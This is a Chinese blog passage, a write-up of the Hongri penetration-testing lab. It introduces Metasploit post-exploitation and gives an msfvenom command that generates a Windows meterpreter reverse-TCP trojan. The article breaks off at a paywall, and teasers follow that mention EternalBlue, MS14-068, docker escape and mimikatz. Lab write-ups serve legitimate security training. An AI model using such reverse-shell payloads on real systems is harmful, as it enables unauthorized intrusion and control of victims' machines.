红日靶场----(四)1.后渗透利用阶段

最新推荐文章于 2025-05-23 19:59:23 发布
原创 最新推荐文章于 2025-05-23 19:59:23 发布 · 650 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #linux #网络 #windows

使用Metasploit进入后渗透利用阶段

    一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
    Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)

常用选项
		-p   				//指定生成的Payload
		--list payload  	//列出所支持的Payload类型
		--list-options      //查看模块所支持的选项
		msfvenom -p windows/meterpreter/reverse_tcp --list-options  //查看模块所支持的选项
			
		-f     				      //指定生成的文件格式
		msfvenom --list formats   //查看所支持的文件格式
		
常用的Windows Payload:
		windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)
		windows/meterpreter_reverse_tcp
		windows/x64/meterpreter/reverse_tcp

1、生成反向木马

使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe

 2、在kali端

最低0.47元/天 解锁文章
红日靶场()
qq_58091216的博客
05-03 1642
红日靶场()环境有点问题,后面在补。
ATT&CK实战:红日靶场
学生
06-19 977
*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);可以使用MS14-068将一个普通域用户提升至域管理员用户。
渗透测试-红日靶场
konglong12311的博客
05-29 1558
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日靶场4
dyx0910的博客
06-29 2680
红日靶场4
红日靶场
m0_70541093的博客
06-30 1672
红日靶场4
红日靶场----(三)1.漏洞利用
zhouA0221的博客
07-09 2807
上期已经信息收集阶段已经完成,接下来是漏洞利用
渗透测试-红日靶场
konglong12311的博客
05-22 2090
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
内网域渗透总结(红日靶场一)
热门推荐
未完成的歌~的博客
04-11 1万+
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
红日靶场实战一 - 学习笔记
m0_64481831的博客
06-18 1511
最近在学习红蓝对抗,如果有兴趣的可以多关注。
红日靶场 4
qq_64201116的博客
01-07 2051
我这里的思路就是通过 certutil 命令下载木马到域控,再通过一层端口转发到我们的 kali,把木马流量转发到我们的 kali 即可上线成功。所以我们就写计划任务了,这里好像是远程机器的 ssh 开启 Public 那个选项,可以写公钥,这里还是利用计划任务演示吧。其实这里可以直接放到 ubuntu 的 web 目录下直接让 dc 访问也可以,当时做的时候传 HFS 方便点。这里是可以执行 phpinfo 的,但是无法执行 system 或者其他 getshell 语句,挺奇怪的。
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-28 6002
ATT&CK红队评估(红日靶场)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
内网渗透——红日靶场
最新发布
2401_88083440的博客
05-23 1870
靶场还是学了很多知识,对于内网也更加得心应手了些,回忆一下整篇打靶的路径:首先是通过Tomcat文件上传,成功获得了docker的shell然后利用docker的权限配置问题,进行了docker逃逸进行了ssh爆破,获得了更加稳定的shell使用frp搭建了代理隧道,期间也解决了一些问题,成功用永恒之蓝打下WIN7加载mimikatz抓取win7账号密码,sid。发现是system权限直接修改本机管理员的密码,打开3389端口登录本机管理员。
红队打靶,红日靶场系列,红日靶场4
qq_47289634的博客
07-12 860
msf乱码,tomcat提权,docker逃逸,内网密码获取,ms17010利用
红日靶场
红队是青春
12-02 4043
红日靶场关 一、环境配置 大家好红日安全红队靶场)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 靶场学习路径,可参考 st漏洞利用 phpmyadmin getshell tomcat 漏洞利用 docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透 WEB-Ubuntu docker开启 sudo docker
红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))
qq_45290991的博客
10-17 3094
文章目录 环境搭建官方描述外网信息收集与利用struts2Tomcat任意文件写入 phpmyadminCVE-2018-12613 远程文件包含任意命令执行包含session文件 docker 逃逸利用特权模式逃逸 权限维持ssh软...
红日靶场4-笔记
m0_60823533的博客
09-27 677
红日靶场4,Docker逃逸,PhpMyadmin文件包含,Struts2命令执行,tomcat任意文件上传
红日靶机()笔记
LINGX5的博客
10-11 1942
这个靶场环境包含了三台机器,一台web,两台window域机器。web服务是使用docker容器搭建的,所以就涉及到docker逃逸。而在获得立足点的过程中,我们要对三个docker容器分别测试,不能漏掉可以逃逸docker容器的机器:分别有struts2的反序列化RCE、tomcat的任意文件上传getshell、phpmyadmin任意文件包含RCE漏洞。获得立足点后,使用到CDK枚举工具查看docker容器的脆弱信息。后渗透涉及到ms17-010(永恒之蓝)和PTH(哈希传递攻击)
红队评估靶场
woshicainiao666的博客
02-23 1653
大大滴靶子
渗透渗透测试红日靶场不知道密码
05-07
红日靶场渗透测试场景中,默认密码或登录凭证通常不会直接提供给用户,而是需要通过特定的技术手段来获取。以下是关于如何获取登录凭证的相关技术细节: #### 使用 `mimikatz` 获取登录凭据 可以通过工具 `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值